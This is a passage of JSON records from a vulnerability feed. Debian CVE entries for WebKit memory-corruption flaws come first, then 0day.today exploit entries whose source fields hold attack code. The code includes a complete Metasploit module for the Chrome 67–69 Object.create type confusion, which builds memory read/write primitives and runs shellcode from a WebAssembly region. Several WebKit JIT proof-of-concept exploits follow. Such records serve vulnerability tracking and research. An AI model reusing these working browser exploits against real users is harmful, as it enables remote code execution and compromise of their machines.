memory corruption. This was addressed with improved state management. This issue affected versions prior to iOS 12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for Windows, iCloud for Windows 7.9.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T18:29:00", "type": "debiancve", "title": "CVE-2018-4438", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-03T18:29:00", "id": "DEBIANCVE:CVE-2018-4438", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T18:58:03", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T18:15:00", "type": "debiancve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-12-18T18:15:00", "id": "DEBIANCVE:CVE-2019-8518", "href": "https://security-tracker.debian.org/tracker/CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-15T18:58:03", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. watchOS before 4.3 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "debiancve", "title": "CVE-2018-4122", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-03T06:29:00", "id": "DEBIANCVE:CVE-2018-4122", "href": "https://security-tracker.debian.org/tracker/CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T18:58:02", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. The issue involves the \"WebKit\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T16:29:00", "type": "debiancve", "title": "CVE-2017-7064", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-20T16:29:00", "id": "DEBIANCVE:CVE-2017-7064", "href": "https://security-tracker.debian.org/tracker/CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-15T18:58:02", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T05:29:00", "type": "debiancve", "title": "CVE-2017-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-22T05:29:00", "id": "DEBIANCVE:CVE-2017-2505", "href": "https://security-tracker.debian.org/tracker/CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-28T03:26:10", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "zdt", "title": "Google Chrome 67 / 68 / 69 Object.create Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34054", "href": "https://0day.today/exploit/description/34054", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Google Chrome 67, 68 and 69 Object.create exploit',\n 'Description' => %q{\n This modules exploits a type confusion in Google Chromes JIT compiler.\n The Object.create operation can be used to cause a type confusion between a\n PropertyArray and a NameDictionary.\n The payload is executed within the rwx region of the sandboxed renderer\n process, so the browser must be run with the --no-sandbox option for the\n payload to work.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'saelo', # discovery and exploit\n 'timwr', # metasploit module\n ],\n 'References' => [\n ['CVE', '2018-17463'],\n ['URL', 'http://www.phrack.org/papers/jit_exploitation.html'],\n ['URL', 'https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=888923'],\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => ['windows', 'osx'],\n 'DefaultTarget' => 0,\n 'Targets' => [ [ 'Automatic', { } ] ],\n 'DisclosureDate' => 'Sep 25 2018'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\n ])\n end\n\n def on_request_uri(cli, request)\n\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\n print_status(\"[*] \" + request.body)\n send_response(cli, '')\n return\n end\n\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\n\n jscript = %Q^\nlet shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);\n\nlet ab = new ArrayBuffer(8);\nlet floatView = new Float64Array(ab);\nlet uint64View = new BigUint64Array(ab);\nlet uint8View = new Uint8Array(ab);\n\nNumber.prototype.toBigInt = function toBigInt() {\n floatView[0] = this;\n return uint64View[0];\n};\n\nBigInt.prototype.toNumber = function toNumber() {\n uint64View[0] = this;\n return floatView[0];\n};\n\nfunction hex(n) {\n return '0x' + n.toString(16);\n};\n\nfunction fail(s) {\n print('FAIL ' + s);\n throw null;\n}\n\nconst NUM_PROPERTIES = 32;\nconst MAX_ITERATIONS = 100000;\n\nfunction gc() {\n for (let i = 0; i < 200; i++) {\n new ArrayBuffer(0x100000);\n }\n}\n\nfunction make(properties) {\n let o = {inline: 42} // TODO\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n eval(`o.p${i} = properties[${i}];`);\n }\n return o;\n}\n\nfunction pwn() {\n function find_overlapping_properties() {\n let propertyNames = [];\n for (let i = 0; i < NUM_PROPERTIES; i++) {\n propertyNames[i] = `p${i}`;\n }\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\\\\n')}\n return [${propertyNames.join(', ')}];\n }\n `);\n\n let propertyValues = [];\n for (let i = 1; i < NUM_PROPERTIES; i++) {\n propertyValues[i] = -i;\n }\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n let r = vuln(make(propertyValues));\n if (r[1] !== -1) {\n for (let i = 1; i < r.length; i++) {\n if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {\n return [i, -r[i]];\n }\n }\n }\n }\n\n fail(\"Failed to find overlapping properties\");\n }\n\n function addrof(obj) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n return o.p${p1}.x1;\n }\n `);\n\n let propertyValues = [];\n propertyValues[p1] = {x1: 13.37, x2: 13.38};\n propertyValues[p2] = {y1: obj};\n\n let i = 0;\n for (; i < MAX_ITERATIONS; i++) {\n let res = vuln(make(propertyValues));\n if (res !== 13.37)\n return res.toBigInt()\n }\n\n fail(\"Addrof failed\");\n }\n\n function corrupt_arraybuffer(victim, newValue) {\n eval(`\n function vuln(o) {\n let a = o.inline;\n this.Object.create(o);\n let orig = o.p${p1}.x2;\n o.p${p1}.x2 = ${newValue.toNumber()};\n return orig;\n }\n `);\n\n let propertyValues = [];\n let o = {x1: 13.37, x2: 13.38};\n propertyValues[p1] = o;\n propertyValues[p2] = victim;\n\n for (let i = 0; i < MAX_ITERATIONS; i++) {\n o.x2 = 13.38;\n let r = vuln(make(propertyValues));\n if (r !== 13.38)\n return r.toBigInt();\n }\n\n fail(\"Corrupt ArrayBuffer failed\");\n }\n\n let [p1, p2] = find_overlapping_properties();\n print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);\n\n let memview_buf = new ArrayBuffer(1024);\n let driver_buf = new ArrayBuffer(1024);\n\n gc();\n\n let memview_buf_addr = addrof(memview_buf);\n memview_buf_addr--;\n print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);\n\n let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);\n\n let driver = new BigUint64Array(driver_buf);\n let original_memview_buf_ptr = driver[4];\n\n let memory = {\n write(addr, bytes) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n memview.set(bytes);\n },\n read(addr, len) {\n driver[4] = addr;\n let memview = new Uint8Array(memview_buf);\n return memview.subarray(0, len);\n },\n readPtr(addr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n return memview[0];\n },\n writePtr(addr, ptr) {\n driver[4] = addr;\n let memview = new BigUint64Array(memview_buf);\n memview[0] = ptr;\n },\n addrof(obj) {\n memview_buf.leakMe = obj;\n let props = this.readPtr(memview_buf_addr + 8n);\n return this.readPtr(props + 15n) - 1n;\n },\n };\n\n // Generate a RWX region for the payload\n function get_wasm_instance() {\n var buffer = new Uint8Array([\n 0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,\n 1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,\n 128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,\n 101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11\n ]);\n return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});\n }\n\n let wasm_instance = get_wasm_instance();\n let wasm_addr = memory.addrof(wasm_instance);\n print(\"wasm_addr @ \" + hex(wasm_addr));\n let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);\n print(\"wasm_rwx @ \" + hex(wasm_rwx_addr));\n\n memory.write(wasm_rwx_addr, shellcode);\n\n let fake_vtab = new ArrayBuffer(0x80);\n let fake_vtab_u64 = new BigUint64Array(fake_vtab);\n let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);\n\n let div = document.createElement('div');\n let div_addr = memory.addrof(div);\n print('div_addr @ ' + hex(div_addr));\n let el_addr = memory.readPtr(div_addr + 0x20n);\n print('el_addr @ ' + hex(div_addr));\n\n fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);\n memory.writePtr(el_addr, fake_vtab_addr);\n\n print('Triggering...');\n\n // Trigger virtual call\n div.dispatchEvent(new Event('click'));\n\n // We are done here, repair the corrupted array buffers\n let addr = memory.addrof(driver_buf);\n memory.writePtr(addr + 32n, original_driver_buf_ptr);\n memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);\n}\n\npwn();\n^\n\n if datastore['DEBUG_EXPLOIT']\n debugjs = %Q^\nprint = function(arg) {\n var request = new XMLHttpRequest();\n request.open(\"POST\", \"/print\", false);\n request.send(\"\" + arg);\n};\n^\n jscript = \"#{debugjs}#{jscript}\"\n else\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\n end\n\n html = %Q^\n<html>\n<head>\n<script>\n#{jscript}\n</script>\n</head>\n<body>\n</body>\n</html>\n^\n\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34054", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T12:56:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-13T00:00:00", "type": "zdt", "title": "WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2018-12-13T00:00:00", "id": "1337DAY-ID-31778", "href": "https://0day.today/exploit/description/31778", "sourceData": "<!--\nBug:\nvoid JSObject::setPrototypeDirect(VM& vm, JSValue prototype)\n{\n ASSERT(prototype);\n if (prototype.isObject())\n prototype.asCell()->didBecomePrototype();\n \n if (structure(vm)->hasMonoProto()) {\n DeferredStructureTransitionWatchpointFire deferred(vm, structure(vm));\n Structure* newStructure = Structure::changePrototypeTransition(vm, structure(vm), prototype, deferred);\n setStructure(vm, newStructure);\n } else\n putDirect(vm, knownPolyProtoOffset, prototype);\n\n if (!anyObjectInChainMayInterceptIndexedAccesses(vm))\n return;\n \n if (mayBePrototype()) {\n structure(vm)->globalObject()->haveABadTime(vm);\n return;\n }\n \n if (!hasIndexedProperties(indexingType()))\n return;\n \n if (shouldUseSlowPut(indexingType()))\n return;\n\n switchToSlowPutArrayStorage(vm);\n}\n\nJavaScriptCore doesn't allow native arrays to have Proxy objects as prototypes. If we try to set the prototype of an array to a Proxy object, it will end up calling either switchToSlowPutArrayStorage or haveABadTime in the above method. switchToSlowPutArrayStorage will transition the array to a SlowPutArrayStorage array. And haveABadTime will call switchToSlowPutArrayStorage on every object in the VM on a first call. Since subsequent calls to haveABadTime won't have any effect, with two global objects we can create an array having a Proxy object in the prototype chain. \n\nExploit:\n case HasIndexedProperty: {\n ArrayMode mode = node->arrayMode();\n \n switch (mode.type()) {\n case Array::Int32:\n case Array::Double:\n case Array::Contiguous:\n case Array::ArrayStorage: {\n break;\n }\n default: {\n clobberWorld();\n break;\n }\n }\n setNonCellTypeForNode(node, SpecBoolean);\n break;\n }\n\nFrom: https://github.com/WebKit/webkit/blob/9ca43a5d4bd8ff63ee7293cac8748d564bd7fbbd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L3481\n\nThe above routine is based on the assumption that if the input array is a native array, it can't intercept indexed accesses therefore it will have no side effects. But actually we can create such arrays which break that assumption making it exploitable.\n\nPoC:\n-->\n\n<body>\n<script>\n\nfunction opt(arr, arr2) {\n arr[1] = 1.1;\n\n let tmp = 0 in arr2;\n\n arr[0] = 2.3023e-320;\n\n return tmp;\n}\n\nfunction main() {\n let o = document.body.appendChild(document.createElement('iframe')).contentWindow;\n\n // haveABadTime\n o.eval(`\nlet p = new Proxy({}, {});\nlet a = {__proto__: {}};\na.__proto__.__proto__ = p;\n`);\n\n let arr = [1.1, 2.2];\n let arr2 = [1.1, 2.2];\n\n let proto = new o.Object();\n let handler = {};\n\n arr2.__proto__ = proto;\n proto.__proto__ = new Proxy({}, {\n has() {\n arr[0] = {};\n\n return true;\n }\n });\n\n for (let i = 0; i < 10000; i++) {\n opt(arr, arr2);\n }\n\n setTimeout(() => {\n delete arr2[0];\n\n opt(arr, arr2);\n\n alert(arr[0]);\n }, 500);\n}\n\nmain();\n\n</script>\n</body>\n", "sourceHref": "https://0day.today/exploit/31778", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-27T14:10:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "zdt", "title": "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-04-03T00:00:00", "id": "1337DAY-ID-32484", "href": "https://0day.today/exploit/description/32484", "sourceData": "WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check\n\n/*\nWhile fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc on macOS):\n*/\n\n // Run with --thresholdForFTLOptimizeAfterWarmUp=1000\n\n // First array probably required to avoid COW backing storage or so...\n const v3 = [1337,1337,1337,1337];\n const v6 = [1337,1337];\n\n function v7(v8) {\n for (let v9 in v8) {\n v8.a = 42;\n const v10 = v8[-698666199];\n }\n }\n\n while (true) {\n const v14 = v7(v6);\n const v15 = v7(1337);\n }\n\n/*\nNote that the sample requires the FTL JIT threshold to be lowered in order to trigger. However, I also have a slightly modified version that (less reliably) crashes with the default threshold which I can share if that is helpful.\n\nFollowing is my preliminary analysis of the crash.\n\nDuring JIT compilation in the FTL tier, the JIT IR for v7 will have the following properties:\n\n* A Structure check will be inserted for v8 due to the property access. The check will ensure that the array is of the correct type at runtime (ArrayWithInt32, with a property 'a')\n* The loop header fetches the array length for the enumeration\n* The element access into v8 is (incorrectly?) speculated to be InBounds, presumably because negative numbers are not actually valid array indices but instead regular property names\n* As a result, the element access will be optimized into a CheckBounds node followed by a GetByVal node (both inside the loop body)\n* The CheckBounds node compares the constant index against the array length which was loaded in the loop header\n\nThe IR for the function will thus look roughly as follows:\n\n # Loop header\n len = LoadArrayLength v8\n // Do other loop header stuff\n\n # Loop body\n CheckStructure v8, expected_structure_id\n StoreProperty v8, 'a', 42\n CheckBounds -698666199, len // Bails out if index is OOB (always in this case...)\n GetByVal v8, -698666199 // Loads the element from the backing storage without performing additional checks\n\n // Jump back to beginning of loop\n\n\nHere is what appears to be happening next during loop-invariant code motion (LICM), an optimization designed to move code inside a loop body in front of the loop if it doesn't need to be executed multiple times:\n\n1. LICM determines that the CheckStructure node can be hoisted in front of the loop header and does so\n2. LICM determines that the CheckBounds node can *not* be hoisted in front of the loop header as it depends on the array length which is only loaded in the loop header\n3. LICM determines that the array access (GetByVal) can be hoisted in front of the loop (as it does not depend on any loop variables) and does so\n\nAs a result of the above, the IR is transformed roughly to the following:\n\n StructureCheck v8, expected_structure_id\n GetByVal v8, -698666199\n\n # Loop header\n len = LoadArrayLength v8\n // Do other loop header stuff\n\n # Loop body\n StoreProperty v8, 'a', 42\n CheckBounds -698666199, len\n\n // Jump back to beginning of loop\n\nAs such, the (unchecked) array element access is now located before the loop header with the bounds check only happening afterwards inside the loop body. The provided PoC then crashes while accessing memory 698666199 * 8 bytes before the element vector for v6. It should be possible to turn this bug into arbitrary out-of-bounds access, but I haven't tried that.\n\nHoisting of GetByVal will only happen if safeToExecute (from DFGSafeToExecute.h) returns true. This function appears to only be concerned about type checks, so in this case it concludes that the GetByVal can be moved in front of the loop header as the StructureCheck (performing the type check) is also moved there. This seems to be the reason that the property store (v8.a = 42) is required as it forces a CheckStructure node which would otherwise be missing.\n\nThe invocations of v7 with a non-array argument (1337 in this case) seem to be necessary to not trigger a bailout in earlier JIT tiers too often, which would prevent the FTL JIT from ever compiling the function.\n*/\n", "sourceHref": "https://0day.today/exploit/32484", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T23:07:25", "description": "WebKit suffers from a JSC JSArray::appendMemcpy uninitialized memory copy vulnerability.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "1337DAY-ID-28183", "href": "https://0day.today/exploit/description/28183", "sourceData": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \r\n\r\nCVE-2017-7064\r\n\r\n\r\nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of JSArray::appendMemcpy.\r\n\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type.\r\n\r\nPoC:\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has 